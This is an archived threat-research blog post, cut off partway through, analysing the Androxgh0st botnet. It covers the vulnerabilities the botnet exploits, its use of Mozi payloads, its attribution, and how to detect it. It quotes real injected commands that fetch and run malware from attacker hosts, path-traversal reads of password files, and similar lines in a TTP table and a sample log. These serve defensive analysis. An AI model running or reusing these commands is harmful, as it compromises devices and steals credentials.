{ "id": "da02bf1e-8913-4f53-bc71-b71d2be374f4", "created_at": "2026-04-06T00:06:46.969485Z", "updated_at": "2026-04-10T03:32:20.977468Z", "deleted_at": null, "sha1_hash": "e7980900e51ed1349bb6b1216fc08c7a366d6c63", "title": "Mozi Resurfaces as Androxgh0st Botnet: Unraveling The Latest Exploitation Wave", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 9364606, "plain_text": "Mozi Resurfaces as Androxgh0st Botnet: Unraveling The Latest\r\nExploitation Wave\r\nBy Koushik Pal\r\nPublished: 2025-12-13 · Archived: 2026-04-05 19:35:07 UTC\r\nWe value your privacy\r\nWe use cookies to enhance your browsing experience, serve personalised ads or content, and analyse our traffic. By clicking\r\n\"Accept All\", you consent to our use of cookies.\r\nBack\r\nThe Androxgh0st botnet, an emerging cyber threat since January 2024, has resurfaced with advanced capabilities and\r\nintegration of IoT-focused Mozi payloads. Exploiting over 20 vulnerabilities in technologies like Cisco ASA, Atlassian\r\nJIRA, PHP frameworks, and IoT devices, Androxgh0st enables unauthorized access and remote code execution. Its growing\r\nsophistication includes shared infrastructure and malware persistence tactics, posing risks to global web servers and IoT\r\nnetworks. CloudSEK’s research highlights the botnet's operational overlap with Mozi, emphasizing the need for immediate\r\npatching and vigilant monitoring to mitigate exploitation risks.\r\nNovember 6, 2024\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 1 of 32\n\nSubscribe to CloudSEK Resources\r\nGet the latest industry news, threats and resources.\r\nExecutive Summary\r\nCloudSEK’s Threat Research team has identified significant developments in the Androxgh0st botnet, revealing its\r\nexploitation of multiple vulnerabilities and a potential operational integration with the Mozi botnet. Active since January\r\n2024, Androxgh0st is known for targeting web servers, but recent command and control (C2) logs indicate it is also\r\ndeploying IoT-focused Mozi payloads. CISA released an advisory on the botnet earlier this year. The botnet, active since\r\nJanuary 2024, targets a broad range of technologies, including Cisco ASA, Atlassian JIRA, and various PHP frameworks,\r\nallowing unauthorized access and remote code execution. This clearly outlines the heightened activity from the botnet\r\noperators, as they are now focusing on a wide range of web application vulnerabilities in order to obtain initial access, in\r\naddition to the 3 CVEs reported earlier by CISA. CloudSEK recommends immediate patching of these vulnerabilities to\r\nmitigate risks associated with the Androxgh0st botnet, which is known for systematic exploitation and persistent backdoor\r\naccess.\r\nAnalysis and Attribution\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 2 of 32\n\nBackground\r\nCloudSEK’s contextual AI digital risk platform XVigil discovered that the Androxgh0st botnet has been exploiting\r\nover 20 vulnerabilities since at least August 2024.\r\nCISA released a security advisory in Jan 2024, raising awareness about the expansion of the Androxgh0st botnet\r\nusing the 3 initial access vectors listed below:\r\n1. Exploiting PHP Vulnerability (CVE-2017-9841) in PHPUnit: Threat actors exploit a vulnerability in the PHPUnit\r\nframework by targeting exposed /vendor folders, specifically using the eval-stdin.php page to execute PHP code\r\nremotely and upload malicious files, establishing backdoor access to compromised websites.\r\n2. Targeting Laravel Framework’s .env and Application Key (CVE-2018-15133): Androxgh0st scans for websites\r\nwith exposed Laravel .env files to steal credentials. If the application key is accessible, it enables encrypted PHP code\r\nexecution through XSRF tokens, allowing file uploads and remote access.\r\n3. Apache Web Server Path Traversal (CVE-2021-41773): By targeting Apache versions 2.4.49 and 2.4.50, threat\r\nactors use path traversal to access files outside the root directory, exploiting improperly configured servers to run\r\narbitrary code and potentially gain sensitive data or credentials.\r\nAbout Mozi Botnet\r\nThe Mozi botnet primarily spanned across China, India and Albania. The botnet targeted Netgear, Dasan, D-Link routers and\r\nMVPower DVR Jaws servers. In 2021, the authors of the Mozi botnet were arrested by the Chinese law enforcement.\r\nThe Mozi botnet creators, or Chinese law enforcement, by forcing the cooperation of the creators - distributed an update\r\nwhich killed Mozi Botnet Agents’ ability to connect to the outside world, leaving only a small fraction of working bots\r\nstanding.\r\nDuring our investigation, we were able to acquire the command and control server logs of Androxgh0st botnet. Our analysis\r\nsheds light on the vulnerabilities being exploited by the botnet, and the common TTPs with Mozi.\r\nAnalysis\r\nDuring our routine scans for malicious infrastructure hunting, CloudSEK’s TRIAD found command and control\r\nservers being used by the Androxgh0st botnet.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 3 of 32\n\nHunting for malicious infrastructure - found misconfigured Logger and Command Sender panels\r\nAs we can see, the servers are storing the POST and GET requests from the botnet agent over time.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 4 of 32\n\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 5 of 32\n\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 6 of 32\n\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 7 of 32\n\nHunting for malicious infrastructure - found misconfigured Logger and Command Sender panels\r\nAndroxgh0st botnet is known to send POST requests containing a number of peculiar strings. \r\nMatching Androxgh0st Botnet related strings\r\nNow that we have confirmed that these servers are communicating with the botnet agents, let us take a look at the type of\r\nweb requests logged on these servers, in order to understand the web application vulnerabilities exploited by the botnet.\r\nVulnerabilities Exploited by Androxgh0st Botnet \r\nCloudSEK’s TRIAD has revealed an array of vulnerabilities being exploited by the Androxgh0st botnet to obtain initial\r\naccess.\r\nAffected Products and Their Impact\r\nAffected Product Impact\r\nCisco ASA (up to 8.4.7/9.1.4) - CVE-2014-2120\r\nArbitrary web script injection or HTML via an unspecified\r\nparameter.\r\nAtlassian JIRA (before version 8.5.14, from\r\nversion 8.6.0 before 8.13.6, and from version\r\n8.14.0 before 8.16.1) - CVE-2021-26086\r\nAllows remote attackers to read particular files via a path traversal\r\nvulnerability in the /WEB-INF/web.xml endpoint.\r\nMetabase GeoJSON Versions x.40.0-x.40.4 -\r\nCVE-2021-41277\r\nAn unauthenticated, remote attacker can exploit this via a specially\r\ncrafted HTTP GET request to download arbitrary files with root\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 8 of 32\n\nAffected Product Impact\r\nprivileges and examine environment variables.\r\nSophos Firewall version v18.5 MR3 and older -\r\nCVE-2022-1040\r\nA remote, unauthenticated attacker can execute arbitrary code\r\nremotely.\r\nOracle EBS versions 12.2.3 through to 12.2.11 -\r\nCVE-2022-21587\r\nUnauthenticated Arbitrary File Upload\r\nOptiLink ONT1GEW GPON 2.1.11_X101 Build\r\n1127.190306\r\nAuthenticated Remote Code Execution\r\nPHP CGI (PHP versions 8.1.* before 8.1.29,\r\n8.2.* before 8.2.20, 8.3.* before 8.3.8) - CVE-2024-4577\r\nAllows an attacker to escape the command line and pass arguments\r\nto be interpreted directly by PHP.\r\nTP-Link Archer AX21 - CVE-2023-1389\r\nAllows unauthenticated command execution as root via the country\r\nparameter in /cgi-bin/luci;stok=/locale.\r\nWordpress Plugin Background Image Cropper\r\nv1.2\r\nRemote Code Execution\r\nNetgear DGN devices (Netgear DGN1000,\r\nfirmware version \u003c 1.1.00.48, Netgear DGN2200\r\nv1)\r\nUnauthenticated Command Execution with root privileges\r\nGPON Home Routers - CVE-2018-10561, CVE-2018-10562\r\nUnauthenticated Command Execution\r\nSpring Cloud Gateway \u003c 3.0.7 \u0026 \u003c 3.1.1 Code\r\nInjection - CVE-2022-22947\r\nRemote Code Execution\r\nZenTao CMS - CNVD-2022-42853 SQL Injection - Sensitive Information Disclosure\r\nAJ-Report - CNVD-2024-15077 Authentication Bypass - Remote Code Execution\r\neYouMail - CNVD-2021-26422 Remote Code Execution\r\nLeadsec VPN - CNVD-2021-64035 Arbitrary File Read - Sensitive Information Disclosure\r\nEduSoho Arbitrary File Read - Sensitive Information Disclosure\r\nUFIDA NC BeanShell - CNVD-2021-30167 Remote Code Execution\r\nOA E-Cology LoginSSO.jsp - CNVD-2021-\r\n33202\r\nSQL Injection - Sensitive Information Disclosure\r\nShopXO Download - CNVD-2021-15822 Arbitrary File Read - Sensitive Information Disclosure\r\nWeaver OA XmlRpcServlet - CNVD-2022-\r\n43245\r\nArbitrary File Read - Sensitive Information Disclosure\r\nRuijie Smartweb Weak Password - Guest Account Takeover\r\nHongjing HCM - CNVD-2023-08743 SQL Injection - Sensitive Information Disclosure\r\nE-Cology V9 - CNVD-2023-12632 SQL Injection - Sensitive Information Disclosure\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 9 of 32\n\nAffected Product Impact\r\nRuckus Wireless Admin through 10.4 - CVE-2023-25717\r\nRemote Code Execution\r\n1. Cisco ASA WebVPN Login Page XSS Vulnerability (CVE-2014-2120): Cross-site scripting (XSS) vulnerability in the\r\nWebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web\r\nscript or HTML via an unspecified parameter.\r\nExploitation attempts - CVE-2014-2120\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 10 of 32\n\nExploitation attempts - CVE-2014-2120\r\nFile Upload Form:\r\nThe code initially creates an HTML form that allows a file to be uploaded (\u003cinput type='file' name='a'\u003e).\r\nWhen a file is uploaded, it is saved to the server with its original filename using the PHP function\r\nmove_uploaded_file(), allowing the attacker to upload arbitrary files to the server.\r\nAppends Code to PHP Files:\r\nIf the URL contains a bak parameter, a second script is activated. This script looks in the current directory for any\r\nfiles with a .php extension.\r\nFor each .php file, it appends the contents of a variable from the POST request ($_POST['file']) to the file. This\r\nessentially allows the attacker to insert arbitrary PHP code into any PHP file in the directory.\r\nThis appending method can be used to spread malicious code across multiple PHP files on the server, establishing a more\r\npersistent presence or further backdooring the application.\r\n2. Limited Remote File Read in Jira Software Server (CVE-2021-26086): This vulnerability allows remote attackers to\r\nread particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before\r\nversion 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.\r\nExploitation attempts - CVE-2021-26086\r\n3. Metabase GeoJSON map local file inclusion Versions x.40.0-x.40.4(CVE-2021-41277): A local file inclusion\r\nvulnerability exists in Metabase due to a security issue present in GeoJSON map support that leads to a local file inclusion\r\nvulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP GET request, to download\r\narbitrary files with root privileges and examine environment variables.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 11 of 32\n\nExploitation attempts - CVE-2021-41277\r\n4. Sophos Authentication bypass vulnerability leads to RCE(CVE-2022-1040): An authentication bypass issue affecting\r\nthe firewall’s User Portal and Webadmin web interfaces. The bypass allows a remote, unauthenticated attacker to execute\r\narbitrary code.\r\nExploitation attempts - CVE-2022-1040\r\n5. Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload (CVE-2022-21587): An unauthenticated\r\narbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions\r\n12.2.3 through to 12.2.11, can be exploited in order to gain remote code execution as the oracle user.\r\nExploitation attempts - CVE-2022-21587\r\n6. OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated): \r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 12 of 32\n\nExploitation attempts - OptiLink Authenticated RCE\r\n7. PHP CGI argument Injection: (CVE-2024-4577): An argument injection issue in PHP-CGI.\r\nExploitation attempts - CVE-2024-4577\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 13 of 32\n\nExploitation attempts - CVE-2024-4577\r\nIt is not common for botnets to append a string at the end of a web request, in this case, “PWN_IT”, which indicates a\r\ntriggered action. \r\nBy injecting these arguments, the attacker is attempting to cause PHP to execute their PWN_IT file. If the file is\r\nlocated on the server and contains malicious PHP code, it could lead to remote code execution, allowing the attacker\r\nto control the server.\r\nBy appending or prepending their file to every PHP request, the attacker ensures their malicious file is executed every\r\ntime a PHP script runs, which allows them to maintain persistence and potentially avoid detection.\r\n8. TP-Link Unauthenticated Command Injection (CVE-2023-1389): An 8.8 CVSS-rated command injection flaw in TP-Link Archer AX21 firmware allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale.\r\nExploitation attempts - CVE-2023-1389\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 14 of 32\n\nThe .sh file downloaded using the RCE is what facilitates the exploit. \r\nIt downloads files from a remote server, makes them executable, executes them with the argument 'selfrep', and then\r\ndeletes the downloaded files.  This process is repeated for multiple files with different names.\r\nThe script downloads and executes files from the remote server at http://154.216.17[.]31. It is evident that it attempts\r\nto download and execute executables ('tarm', 'tarm5', 'tarm6', 'tarm7', 'tmips', 'tmpsl', 'tsh4', 'tspc', 'tppc', 'tarc'). The\r\ndownloaded files are made executable and executed with the argument 'selfrep'. After execution, the downloaded files\r\nare deleted.\r\nIt uses the command '/bin/busybox' to execute commands. This suggests that the script is likely running on a system\r\nwith a busybox environment, which confirms the usage against TP-Link routers.\r\n9. GeoServer RCE Vulnerability(CVE-2024-36401): Versions of GeoServer prior to 2.25.1, 2.24.3, and 2.23.5 allow\r\nunauthenticated remote code execution by mishandling OGC request parameters, permitting unsafe evaluation of XPath\r\nexpressions.\r\nExploitation attempts - CVE-2024-36401\r\n10. WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution: \r\nExploitation attempts - WordPress Plugin Background Image Cropper RCE\r\n11. Wordpress Bruteforce Attacks: The botnet cycles through common administrative usernames and uses a consistent\r\npassword pattern.The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress\r\nsites. If the authentication is successful, it gains access to critical website controls and settings.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 15 of 32\n\nWordpress Bruteforce Attack on Admin Panel\r\n12. Unauthenticated Command Execution on Netgear DGN devices: The embedded web server skips authentication\r\nchecks for some URLs containing the \"currentsetting.htm\" substring. As an example, the following URL can be accessed\r\neven by unauthenticated attackers:http://\u003ctarget-ip-address\u003e/setup.cgi?currentsetting.htm=1.Then, the \"setup.cgi\" page can\r\nbe abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text\r\npassword for the \"admin\" user), an attacker can access the following URL:     \r\nhttp://\u003ctarget-ip-address\u003e/setup.cgi?\r\nnext_file=netgear.cfg\u0026todo=syscmd\u0026cmd=cat+/www/.htpasswd\u0026curpath=/\u0026currentsetting.htm=1\r\nAn attacker can replace the command with the command they want to run. \r\nNow, upon looking at the command and control server logs, we noticed a GET request that was exploiting this old\r\nvulnerability. We can also see what the injected commands are.\r\nNetgear Router Exploitation by Androxgh0st Botnet using Mozi payload\r\nInjected Commands:\r\ncmd=rm -rf /tmp/*; wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear\r\nThe command sequence is as follows:\r\nrm -rf /tmp/*: This deletes all files in the /tmp directory, to clear any old data and ensure enough storage for the\r\ndownloaded malware.\r\nwget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear: This uses wget to download a malicious file named\r\nMozi.m from an external server (200.124.241[.]140:44999) and saves it as /tmp/netgear.\r\nsh netgear: This runs the downloaded file as a shell script. Mozi.m likely contains malicious code. Once executed, the\r\ntarget device becomes part of the botnet.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 16 of 32\n\nThe downloaded file, Mozi.m, is associated with the Mozi botnet. Mozi is a known botnet that primarily targets IoT devices\r\nby exploiting vulnerabilities to add them to a network of compromised devices.\r\n13. Unauthenticated Command Execution on GPON routers(CVE-2018-10561, CVE-2018-10562): \r\nCVE-2018-10561: Dasan GPON home routers allow authentication bypass by appending ?images to URLs that typically\r\nrequire login, such as /menu.html?images/ or /GponForm/diag_FORM?images/, enabling unauthorized device access.\r\nCVE-2018-10562: Dasan GPON routers are vulnerable to command injection via the dest_host parameter in a\r\ndiag_action=ping request to the /GponForm/diag_Form URI. The router stores ping results in /tmp, which can be accessed\r\nby revisiting /diag.html, allowing commands to be executed and their output retrieved.\r\nGPON Router Exploitation by Androxgh0st Botnet using Mozi payload\r\n14. Spring Cloud Gateway \u003c 3.0.7 \u0026 \u003c 3.1.1 Code Injection (CVE-2022-22947) - Applications are vulnerable to a code\r\ninjection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.\r\nSpring Cloud Gateway Exploitation by Androxgh0st Botnet \r\n15. ZenTao CMS - SQL Injection (CNVD-2022-42853) - Zen Tao has a SQL injection vulnerability. Attackers can exploit\r\nthe vulnerability to obtain sensitive database information.\r\nZenTao CMS Exploitation by Androxgh0st Botnet \r\n16. AJ-Report Authentication Bypass and Remote Code Execution Vulnerability (CNVD-2024-15077) - The platform\r\ncan execute commands in the corresponding value of the validationRules parameter through post method, obtain server\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 17 of 32\n\npermissions, and log in to the management background to take over the large screen. A remote unauthenticated attacker can\r\ncompromise the server to steal confidential information, install ransomware, or pivot to the internal network. \r\nAJ-Report Exploitation by Androxgh0st Botnet \r\n17. eYouMail - Remote Code Execution (CNVD-2021-26422) -  eYouMail is susceptible to a remote code execution\r\nvulnerability.\r\neYouMail Exploitation by Androxgh0st Botnet \r\n18. Leadsec VPN - Arbitrary File Read (CNVD-2021-64035) - An information leakage vulnerability in the SSL VPN of\r\nBeijing Wangyuxingyun Information Technology Co., Ltd., can be exploited by an attacker to read sensitive information\r\nfrom arbitrary files located on the file system of the server.\r\nLeadsec VPN Exploitation by Androxgh0st Botnet \r\n19. EduSoho Arbitrary File Read Vulnerability - There is an unauthorized arbitrary file reading vulnerability in the\r\nclassroom-course-statistics interface of the education and training system. Through this vulnerability, an attacker can read\r\nthe contents of the config/parameters.yml file and obtain the secret value and database account password saved in the file.\r\nSensitive information. After getting the secret value, threat actors can further use it. It is important to note that this\r\ntechnology is predominantly used by the Chinese.\r\nEduSoho Exploitation by Androxgh0st Botnet \r\n20. UFIDA NC BeanShell Remote Code Execution (CNVD-2021-30167) - An attacker can exploit this vulnerability to\r\nremotely execute code without authorization. It is important to note that this technology is predominantly used by the\r\nChinese.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 18 of 32\n\nUFIDA NC BeanShell Exploitation by Androxgh0st Botnet \r\n21. OA E-Cology LoginSSO.jsp SQL Injection (CNVD-2021-33202) - e-cology is an OA office system(used\r\npredominantly in China) specially produced for large and medium-sized enterprises that supports simultaneous office work\r\non PC, mobile and WeChat terminals. An attacker could exploit this SQL injection vulnerability to obtain sensitive\r\ninformation.\r\nE-cology Exploitation by Androxgh0st Botnet \r\n22. ShopXO Download arbitrary file reading vulnerability (CNVD-2021-15822) - Shopxo is an open source enterprise\r\nlevel open source e-commerce system used predominantly in China. Shopxo has an arbitrary file read vulnerability that an\r\nattacker can use to obtain sensitive information.\r\nShopXO Exploitation by Androxgh0st Botnet \r\n23. Weaver OA XmlRpcServlet - Arbitrary File Read (CNVD-2022-43245) - e-office is a standard collaborative mobile\r\noffice platform predominantly used in China. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited\r\nby attackers to obtain sensitive information. \r\nE-office Exploitation by Androxgh0st Botnet \r\n24. Ruijie Smartweb Weak Password - Ruijie smartweb management system (predominantly used in China) opens the\r\nguest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further\r\nattack (guest/guest) .\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 19 of 32\n\nRuijie Smartweb Exploitation by Androxgh0st Botnet \r\n25. Hongjing HCM SQL injection vulnerability (CNVD-2023-08743) - An SQL injection vulnerability exists in Hongjing\r\nHuman Resource Management System, using which attackers can obtain sensitive database information.\r\nHongjing HCM Exploitation by Androxgh0st Botnet \r\n26. E-Cology V9 - SQL Injection (CNVD-2023-12632) - Ecology9 is a collaborative office system created by Panmicro\r\nfor medium and large organizations. It is used predominantly in China. There is a SQL injection vulnerability in Panmicro\r\necology9, which can be exploited by attackers to obtain sensitive database information.\r\nE-Cology V9 Exploitation by Androxgh0st Botnet \r\n27. Ruckus Wireless Admin through 10.4 (CVE-2023-25717) - Ruckus Wireless Admin through 10.4 allows Remote\r\nCode Execution via an unauthenticated HTTP GET Request. Androxgh0st checks if the network device is running with\r\ndefault credentials, and if so, it pings the IP address 45.221.98[.]117.\r\nRuckus Wireless Admin Exploitation by Androxgh0st Botnet \r\nPossibilities:\r\nMozi Payload as a Component of Androxgh0st:\r\nIt’s possible that Androxgh0st has fully integrated Mozi’s payload as a module within its own botnet architecture. In\r\nthis case, Androxgh0st is not just collaborating with Mozi but embedding Mozi’s specific functionalities (e.g., IoT\r\ninfection \u0026 propagation mechanisms) into its standard set of operations.\r\nThis would mean that Androxgh0st has expanded to leverage Mozi’s propagation power to infect more IoT devices,\r\nusing Mozi’s payloads to accomplish goals that otherwise would require separate infection routines.\r\nUnified Command Infrastructure:\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 20 of 32\n\nIf both botnets are using the same command infrastructure, it points to a high level of operational integration,\r\npossibly implying that both Androxgh0st and Mozi are under the control of the same cybercriminal group. This\r\nshared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and\r\nefficiency of their combined botnet operations.\r\nTRIAD recommends that organizations patch these vulnerabilities being exploited in the wild as soon as possible to reduce\r\nthe probability of being compromised by the Androxgh0st/Mozi Botnet.\r\nTTP Examples: Mozi vs Androxgh0st\r\nTTP Example - Mozi Example - Androxgh0st\r\nCommand\r\nInjection\r\nand same\r\npaths\r\n/setup.cgi?\r\ncmd=wget+http://[attacker_url]/Mozi.m+-\r\nO+/tmp/netgear;sh+netgear\r\n/cgi-bin/admin.cgi?\r\ncommand=ping\u0026ip=127.0.0.1;wget+http://[attacker_url]/androx.s\r\nO+/tmp/androx;sh+/tmp/androx\r\nFile\r\nInclusion\r\n/admin.cgi?file=../../../../etc/passwd /config.cgi?file=../../../../../../etc/shadow\r\nExploitation\r\nof Admin\r\nPanels\r\nusing\r\nbruteforce\r\nPOST /login.cgi?\r\nlog=admin\u0026pwd=admin123\r\nPOST /wp-login.php?log=admin\u0026pwd=Passnext%40123456\r\nPayload\r\nDownload\r\nand\r\nExecution\r\nwget http://[attacker_url]/mozi_arm;\r\nchmod +x mozi_arm; ./mozi_arm \u0026\r\ncurl http://[attacker_url]/androx_arm -o /tmp/androx_arm; ch\r\n+x /tmp/androx_arm; /tmp/androx_arm\r\nBoth botnets share infection tactics involving command injection, credential stuffing, file inclusion, and exploitation of IoT-focused CVEs.\r\nGlobal Infection Statistics\r\nThe number of affected devices by the Androxgh0st botnet is increasing by the day. At the time of writing this blog, over\r\n500 devices have been infected.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 21 of 32\n\nBots by country\r\nAttribution\r\nLet’s take a closer look at the Ruckus Wireless Admin (CVE-2023-25717) exploitation by the botnet.\r\nAndroxgh0st Botnet pings an IP (part of their infrastructure) as part of the exploitation of the RCE\r\nvulnerability\r\nA reverse IP lookup on the IP address reveals two domains:\r\n1xbw[.]com\r\nMgn4[.]com\r\nUpon looking at the passive DNS history of mgn4[.]com, we see that the domain has been rotated across multiple IP\r\naddresses from the same subnet mask since July 2023.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 22 of 32\n\nInfrastructure used by the threat actor since July 2023\r\nThis indicates that the threat group was involved in malicious activities using the domain name at least since July 2023.\r\nUpon inspecting the communicating files with this domain, we found a malicious excel with the filename containing\r\nmandarin characters. This phishing bait, first seen in the wild in July 2023, was used by the threat actors to target a hospital\r\nin Hong Kong. The file name translates to “Kwai Chung Hospital DO16191.xlsx”.(md5: \r\n039987db7dc1dea01547e0f3066f8d5d)\r\n Phishing bait used by the threat actor first seen in the wild in July 2023 to target a hospital in Hong Kong\r\nComing back to the PHP command injection vulnerability, we noticed an uncommon string in the payload. As explained\r\npreviously, by prepending and appending, the attacker ensures their malicious file is executed every time a PHP script runs.\r\nThe string “PWN_IT” is likely an indicator/flag used as a persistence mechanism, and we can ascertain with high\r\nconfidence that it is something that the threat actor(s) have named themselves.\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 23 of 32\n\nA simple search led us to a “CTF-team” called “pwn_it”, led by user “ChenSem”.\r\n These CTFs are hosted by “Kanxue”. Kanxue is a Chinese “developer” community, focused on “security research” and\r\n“reverse engineering” of PC, mobile, and smart devices. We can see the logo of China’s State Council on their website.\r\nNow, this definitely piqued our interest as it's not uncommon for CTFs held in China to hack real world targets. Recent\r\nexamples have shown that CTF organizers often need the students to sign a document agreeing to several unusual terms,\r\naimed at keeping such operations covert. Here’s what we observed:\r\n1. The latest CTF played by “pwn_it” on Kanxue was in 2020, even though “ChenSem” appears to be a heavy-duty CTF\r\nplayer, indicated by their score of 501. Interestingly, that was around the same time the world saw heightened Mozi Botnet\r\nactivity in the wild. \r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 24 of 32\n\n2. The CTF hosted by Kanxue in 2024 started in August, which is around the same time when Androxgh0st TP-link\r\nexploitation was observed in the wild.\r\n3. “Pwn_it” has also been used as a function within the source code on multiple occasions. We noticed blogs by “V1ct0r”\r\nwho has written over 90 articles on security research and reverse engineering. \r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 25 of 32\n\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 26 of 32\n\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 27 of 32\n\nTheir online portfolio is hosted on Github (gdufs-king.github[.]io), with Mandarin as the default language. GDUFS refers to\r\nthe Guangdong University of Foreign Studies, implying that the author most-likely used to be a student at a Chinese\r\nuniversity. While there is no direct relationship established between this CTF team and the botnet, we have certainly\r\nobserved that the usage of the “pwn_it” string within malware and web requests, is popular within this CTF team.\r\nConclusion\r\nWe have seen a spike in Androxgh0st targeting technologies that are used within the Chinese ecosystems. This comes\r\nafter the “kill-switch” was allegedly used by the Chinese authorities in 2021. This points towards increased mass-surveillance efforts by the actors that overlaps with the state’s interests.\r\nWe have observed that the threat actors operating the botnet had targeted a hospital from Hong Kong in July 2023,\r\nwhich coincides with the victimology of Chinese APTs such as APT41 and Tonto Team. \r\nBased on the available information, we can ascertain with low confidence that the Androxgh0st botnet is being\r\noperated by Chinese threat actors that are driven by similar interests as that of the Chinese state, i.e., mass-surveillance. As we have seen in the i-soon leaks, the APT market is cluttered with many different private companies\r\nwho can provide “pentesting and red-teaming services” to the state.\r\nWe are looking at a trend where the threat actors are regularly updating their arsenal with the most recent exploits\r\nthat can be easily exploited. We can expect Androxgh0st to be exploiting at least 75% more web-application\r\nvulnerabilities by mid- 2025 than it’s exploiting now.\r\nChecking for signs of compromise\r\n1. Review HTTP and Web Server Logs\r\nCheck for Suspicious Requests: Look for HTTP GET or POST requests that include unusual or suspicious\r\ncommands, such as wget, curl, or command injection parameters like cmd=rm or cmd=wget. These are common\r\nsigns of attempted command injection by Androxgh0st.\r\nExample log entries to watch for:\r\nGET /cgi-bin/admin.cgi?command=ping\u0026ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-\r\nO+/tmp/androx;sh+/tmp/androx\r\nPOST /wp-login.php HTTP/1.1 log=admin\u0026pwd=Passnext%40123456\r\nCheck for Unusual Login Attempts: Look for repeated failed login attempts, indicating brute-force activity on login\r\npages such as /wp-login.php, /admin_login, or /cgi-bin/login.cgi. These may target default credentials or weak\r\npasswords.\r\n2. Monitor System Processes for Unexpected Activity\r\nIdentify Suspicious Processes: Use commands like ps aux or top to look for unexpected processes running from\r\nunusual locations (e.g., /tmp, /var/tmp, or /dev/shm), which is typical of botnet payloads.\r\nAndroxgh0st may execute commands such as:\r\n/tmp/androx\r\nhttps://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave\r\nPage 28 of 32\n\nInspect Crontab Entries and Startup Scripts: Androxgh0st often attempts persistence by modifying crontab files\r\nor startup scripts. Use the following commands to check for any suspicious entries:\r\ncrontab -l\r\ncat /etc/rc.local\r\ncat /etc/cron.d/*\r\n3. Examine Suspicious Files in Temporary Directories\r\nInspect /tmp, /var/tmp, and /dev/shm Directories: Androxgh0st payloads and scripts are often downloaded and\r\nexecuted from these directories. Look for files with unusual names or recent changes in these 